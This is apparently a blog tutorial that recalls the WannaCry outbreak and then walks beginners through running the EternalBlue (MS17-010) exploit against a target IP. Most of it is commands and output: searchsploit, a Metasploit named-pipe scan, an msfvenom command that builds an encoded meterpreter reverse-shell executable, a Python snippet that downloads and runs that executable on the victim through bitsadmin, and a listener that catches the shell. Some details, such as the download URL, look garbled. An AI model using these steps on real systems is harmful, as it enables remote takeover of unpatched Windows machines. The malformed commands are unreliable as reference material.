Falling Prey to EternalBlue | A Beginner's Guide to a Devastating Exploit
On May 12th, 2017, computers around the world went black. Hospitals in the UK were turning patients away because they couldn't gain access to their medical systems. Telecommunications companies were telling their employees to power down their computers. The NSA was panicking, trying to determine how they could have leaked out such confidential information which helped spark this computational catastrophe.
This was the WannaCry ransomware attack, and it amounted to approximately $4 Billion in losses. Using a cryptoworm which targeted the Windows OS, victim's personal files were being encrypted by the attacker, demanding that the victim send a payment in Bitcoin in order for their files to be formatted to their original state. It is astonishing that this ransomware, only lasting a period of four days, had this much damage!
But what I think is even more shocking is that the method behind the attack is still open for the public to use. I am referring to the exploit EternalBlue.
This cybercrime exploit was originally developed by the NSA, yet it was leaked by the hacker group the Shadow Brokers in April of 2017. It allows one to gain access to other devices on a network. EternalBlue can be run using Metasploit, Python, and other methods that we don't need to focus on.
Now, while I obviously don't encourage one to use this exploit in the hopes of attacking another's device, in this article, we're going to go over the process of running the exploit with its Python implementation and Metasploit.
When I run my Metasploit programs in this explanation, it will be on the Kali Linux. Now as a quick overview, Metasploit is platform that allows one to write and test exploits and develop tools to stop them. There are a large lists of exploits one can run using this platform. Here's a list of a few of them:
Once on determines which exploit package they want to use, you can view which OS's the exploit can affect.
Now, when running EternalBlue, there are three steps to follow: Setting up the exploit, forming a connection to the target device, and serving the payload and running the exploit.
1. Setting Up the Exploit
To start off, we first need to actually find the exploit. On the Kali Linux terminal, type in searchsploit eternalblue. You will receive this as a result:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42031.py
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42315.py
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------------------
Paper Title | Path
| (/usr/share/exploitdb-papers/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------------------
How to Exploit ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008 | docs/english/41896-how-to-exploit-eternalblue-
How to Exploit ETERNALBLUE on Windows Server 2012 R2 | docs/english/42280-how-to-exploit-eternalblue-
[Spanish] How to Exploit ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008 | docs/spanish/41897-[spanish]-how-to-exploit-et
[Spanish] How to Exploit ETERNALBLUE on Windows Server 2012 R2 | docs/spanish/42281-[spanish]-how-to-exploit-et
------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------------------------
The part we want to focus on is 42315.py. 42315.py is the actual exploit. Let's run it by inputting python exploit.py. We will get this as a result.
exploit.py <ip> [pipe_name]
We are now in perfect position to input our target device's information, and thus move on to step 2!
2. Forming a Connection to the Target Device
There are two tasks that we need to accomplish in this step: finding a Named Pipe and inputting the target's IP address.
Regarding the former, a pipe is a portion of shared memory that is used for communication processes. Named pipes allow communication between multiple devices without resistance or overhead. Named pipes use ports to communicate, such as 445/tcp, 137/tcp, 139/tcp. Now, why do we have to find a named pipe of the target's device? This is needed because finding the pipe can establish a connection between the attacker (us) and the target device, thus allowing us to be able to transfer files over between the devices, as we will do later on.
To search for available named pipes, we can use a Metasploit scanner. Input the following:
msfconsole search pipe
This will output a list of modules. The one we want is pipe_auditor. Load this module by writing:
use auxiliary/scanner/smb/pipe_auditor
We have to now input the target's IP address to find the available pipes. Type in options and this will be the output:
Module options (auxiliary/scanner/smb/pipe_auditor): Name Current Setting Required Description ---- --------------- -------- ----------- NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target address range or CIDR identifier SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads
What we are focusing on is RHOSTS. This is where we will input the IP address. Let's say our target's IP address is 44.254.101.206. Input the following:
set rhosts 44.254.101.206
Now we can run the scanner! In our case, we will get this as a result:
[+] 44.254.101.206:445 - Pipes: \netlogon, \lsarpc, \samr [*] 44.254.101.206: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
We can see that the available pipes are netlogon, lsarpc, and samr. And now that we have the necessary information of the target device, we can begin to run the exploit!
3. Serving the Payload and Running the Exploit
A payload is the actual data in a transmission (i.e. not the header and other components). Our exploit has to execute this payload. We will create a shellcode for our payload. A shellcode is a list of instructions injected and executed by an exploit. We will use Apache to run our payload and MSFvenom, another Metasploit tool, to create our shellcode.
Let's say our IP address is 72.183.189.157. To generate the payload, input the following code in a new terminal:
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=72.183.189.157 lport=4321 -e x64/xor -i 5 -f exe -o /var/www/html/temp.exe
This creates the shellcode and saves it to a file called temp.exe in the open source base folder for the Apache server. Once we run the Apache server, a connection between our device to the target's device will be established and the payload can be executed. Input the following to do this:
service apache2 start
Before we finally run the exploit, we have to create a file to send to the target. This file will harness the payload and allow it to spring off and begin its functions. In other words, the payload will run through this file. We can create this file within the actual Python code.
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
service_exec(conn, r'cmd /c bitsadmin /transfer pwn /download https://44.254.101.206:445/temp.exe C:\temp.exe')
service_exec(conn, r'cmd /c /temp.exe')
def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
with open(localSrc, 'rb') as fp:
smbConn.putFile(remoteDrive + '$', remotePath, fp.read)
This portion of the code will create a connection to the target device and create the file. service_exec() will take the payload and run it through the file.
When running the exploit, we will use the reverse TCP shell protocol so we can be alerted if our exploit has run successfully. The following will be our "listener" to see if exploit achieved its intended purpose:
msfconsole use exploit/multi/handler
Then, we establish the reverse TCP protocol:
set payload windows/x64/meterpreter/reverse_tcp
Set the listening host (our IP address), the listening port (our port that is listening for a response), and then run the protocol.
set lhost 72.183.189.157 set lport 4321 run
Once this is all complete, we can finally run the exploit. Input the following to do so:
python exploit.py 44.254.101.206 netlogon
We will know if our exploit ran successfully if we receive a Meterpreter session. This is an interactive shell from which an attacker can explore the target machine and execute code.
And we're done! We've successfully infiltrated one's device on a network. This can all seem very complicated and scary at first, but once you look past all the illegal harm that this exploit can cause, it can actually be quite interesting and fun to learn about! However, this relatively uncomplicated program can cause catastrophic harm in the wrong hands. But through new developments in machine learning, quantum cryptography, Blockchain, and other exponential technologies, dangerous exploits like EternalBlue will be erased... eternally!
Main Takeaways
- EternalBlue allows one to gain access to other devices on the network
- It can be implemented using Python and Metasploit
- Running EternalBlue requires three main steps: Setting up the exploit, forming a connection to the target device, and serving the payload and running the exploit
?? Hey! Thanks for reading! If you want to learn about more projects that I’m working on, follow me on LinkedIn!
Owner ( CFO) Interfuse Corporation Inc.
4 年I really enjoyed how you STEP BY STEP , taught me how you created this computer hack! Not that , as you said , l want to repeat this activity but l learned how very easy it is to create major problems for a computer system. Out of interest , do you know how to program the new quantum computer? I know the language is different from analoge computers. To me , it seems this language will be very important in the future of computing and computer science.